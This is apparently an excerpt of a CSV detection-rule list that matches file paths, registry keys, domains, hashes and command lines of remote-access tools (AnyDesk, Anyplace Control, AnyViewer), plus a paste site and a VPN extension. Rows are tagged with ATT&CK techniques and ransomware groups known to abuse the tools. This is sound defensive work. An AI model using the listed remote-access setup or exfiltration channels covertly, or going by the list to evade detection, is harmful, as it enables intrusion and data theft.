"*\adprinterpipe*",".{0,1000}\\adprinterpipe.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AnyDesk (1).exe*",".{0,1000}\\AnyDesk\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AnyDesk.exe*",".{0,1000}\\AnyDesk\.exe.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AnyDesk.lnk*",".{0,1000}\\AnyDesk\.lnk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AnyDesk\ad.trace*",".{0,1000}\\AnyDesk\\ad\.trace.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AnyDesk\ad_svc.trace*",".{0,1000}\\AnyDesk\\ad_svc\.trace.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AnyDesk\connection_trace.txt*",".{0,1000}\\AnyDesk\\connection_trace\.txt.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AnyDesk\connection_trace.txt*",".{0,1000}\\AnyDesk\\connection_trace\.txt.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\anydesk\printer_driver*",".{0,1000}\\anydesk\\printer_driver.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AnyDesk\service.conf*",".{0,1000}\\AnyDesk\\service\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AnyDeskPrintDriver.cat*",".{0,1000}\\AnyDeskPrintDriver\.cat.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\anydeskprintdriver.inf*",".{0,1000}\\anydeskprintdriver\.inf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\anydeskprintdriver.inf*",".{0,1000}\\anydeskprintdriver\.inf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\AnyDesk\system.conf*",".{0,1000}\\AppData\\Roaming\\AnyDesk\\system\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\AnyDesk\user.conf*",".{0,1000}\\AppData\\Roaming\\AnyDesk\\user\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\ControlSet001\Services\AnyDesk*",".{0,1000}\\ControlSet001\\Services\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\Pictures\AnyDesk*",".{0,1000}\\Pictures\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\Prefetch\ANYDESK.EXE*",".{0,1000}\\Prefetch\\ANYDESK\.EXE.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\ProgramFile*\previous-version",".{0,1000}\\ProgramFile.{0,40}\\previous-version","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","old anydesk version after update","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Clients\Media\AnyDesk*",".{0,1000}\\SOFTWARE\\Clients\\Media\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\Temp\AnyDeskUninst*",".{0,1000}\\Temp\\AnyDeskUninst.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*\Videos\AnyDesk*",".{0,1000}\\Videos\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*0DBF152DEAF0B981A8A938D53F769DB8*",".{0,1000}0DBF152DEAF0B981A8A938D53F769DB8.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage - compromised certificate - https://anydesk.com/en/changelog/windows","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","#certificate","compromised certificate","8","8","N/A","N/A","N/A","N/A"
"*9CD1DDB78ED05282353B20CDFE8FA0A4FB6C1ECE*",".{0,1000}9CD1DDB78ED05282353B20CDFE8FA0A4FB6C1ECE.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage - compromised certificate - https://anydesk.com/en/changelog/windows","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","#certificate","compromised certificate","8","8","N/A","N/A","N/A","N/A"
"*9D7620A4CEBA92370E8828B3CB1007AEFF63AB36A2CBE5F044FDDE14ABAB1EBF*",".{0,1000}9D7620A4CEBA92370E8828B3CB1007AEFF63AB36A2CBE5F044FDDE14ABAB1EBF.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage - compromised certificate - https://anydesk.com/en/changelog/windows","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","#certificate","compromised certificate","8","8","N/A","N/A","N/A","N/A"
"*AnyDesk Software GmbH*",".{0,1000}AnyDesk\sSoftware\sGmbH.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A"
"*anydesk.exe --set-password*",".{0,1000}anydesk\.exe\s\-\-set\-password.{0,1000}","greyware_tool_keyword","anydesk","setting the AnyDesk service password manually","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*boot.net.anydesk.com*",".{0,1000}boot\.net\.anydesk\.com.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","1","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*C:\Program Files (x86)\AnyDesk*",".{0,1000}C\:\\Program\sFiles\s\(x86\)\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*Desktop\AnyDesk.lnk*",".{0,1000}Desktop\\AnyDesk\.lnk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*HKCR\.anydesk\*",".{0,1000}HKCR\\\.anydesk\\.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*relay-*.net.anydesk.com*",".{0,1000}relay\-.{0,1000}\.net\.anydesk\.com.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","1","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*https://anymailfinder.com/search/*",".{0,1000}https\:\/\/anymailfinder\.com\/search\/.{0,1000}","greyware_tool_keyword","anymailfinder","used by attackers to find informations about a company users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://anymailfinder.com","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/anyplace-control/data2/*.exe*",".{0,1000}\/anyplace\-control\/data2\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Anyplace Control - Admin.lnk*",".{0,1000}\\Anyplace\sControl\s\-\sAdmin\.lnk.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Anyplace Control\*",".{0,1000}\\Anyplace\sControl\\.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\anyplace-control.ini*",".{0,1000}\\anyplace\-control\.ini.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\*\zmstage.exe*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\zmstage\.exe.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Anyplace Control*",".{0,1000}\\AppData\\Roaming\\Anyplace\sControl.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\Anyplace Control*",".{0,1000}\\Program\sFiles\s\(x86\)\\Anyplace\sControl.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\Anyplace Control *",".{0,1000}\\ProgramData\\Anyplace\sControl\s.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Anyplace Control Software<*",".{0,1000}\>Anyplace\sControl\sSoftware\<.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*a2fa034d006bdbc3ee2a15e55eb647f8097355c288a858da1e309fe8ac1cf0a3*",".{0,1000}a2fa034d006bdbc3ee2a15e55eb647f8097355c288a858da1e309fe8ac1cf0a3.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*AnyplaceControlInstall.exe*",".{0,1000}AnyplaceControlInstall\.exe.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Program Files (x86)\Anyplace Control*",".{0,1000}Program\sFiles\s\(x86\)\\Anyplace\sControl.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*www.anyplace-control.com/install*",".{0,1000}www\.anyplace\-control\.com\/install.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/AnyViewerSetup.exe*",".{0,1000}\/AnyViewerSetup\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AnyViewerSetup.exe*",".{0,1000}\\AnyViewerSetup\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AnyViewerSetup.tmp*",".{0,1000}\\AnyViewerSetup\.tmp.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\logs\RCService.txt*",".{0,1000}\\logs\\RCService\.txt.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>AnyViewer Setup<*",".{0,1000}\>AnyViewer\sSetup\<.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>AnyViewer<*",".{0,1000}\>AnyViewer\<.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*0de968ffd4a6c60413cac739dccb1b162f8f93f3db754728fde8738e52706fa4*",".{0,1000}0de968ffd4a6c60413cac739dccb1b162f8f93f3db754728fde8738e52706fa4.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*334ec9e7d937c42e8ef12f9d4ec90862ecc5410c06442393a38390b34886aa59*",".{0,1000}334ec9e7d937c42e8ef12f9d4ec90862ecc5410c06442393a38390b34886aa59.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*a.aomeisoftware.com*",".{0,1000}a\.aomeisoftware\.com.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AnyViewer\audio_sniffer.dll*",".{0,1000}AnyViewer\\audio_sniffer\.dll.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AnyViewer\AVCore.exe*",".{0,1000}AnyViewer\\AVCore\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AnyViewer\RCService.exe*",".{0,1000}AnyViewer\\RCService\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AnyViewer\ScreanCap.exe*",".{0,1000}AnyViewer\\ScreanCap\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AnyViewer\SplashWin.exe*",".{0,1000}AnyViewer\\SplashWin\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*controlserver.anyviewer.com*",".{0,1000}controlserver\.anyviewer\.com.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://ip138.com/iplookup.asp?ip=*&action=2*",".{0,1000}https\:\/\/ip138\.com\/iplookup\.asp\?ip\=.{0,1000}\&action\=2.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Program Files (x86)\AnyViewer*",".{0,1000}Program\sFiles\s\(x86\)\\AnyViewer.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://apaste.info/p/new*",".{0,1000}https\:\/\/apaste\.info\/p\/new.{0,1000}","greyware_tool_keyword","apaste.info","Creating a paste on apaste.info/","T1213 - T1190","TA0001 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://apaste.info/","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*jbnmpdkcfkochpanomnkhnafobppmccn*",".{0,1000}jbnmpdkcfkochpanomnkhnafobppmccn.{0,1000}","greyware_tool_keyword","apkfold free vpn","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
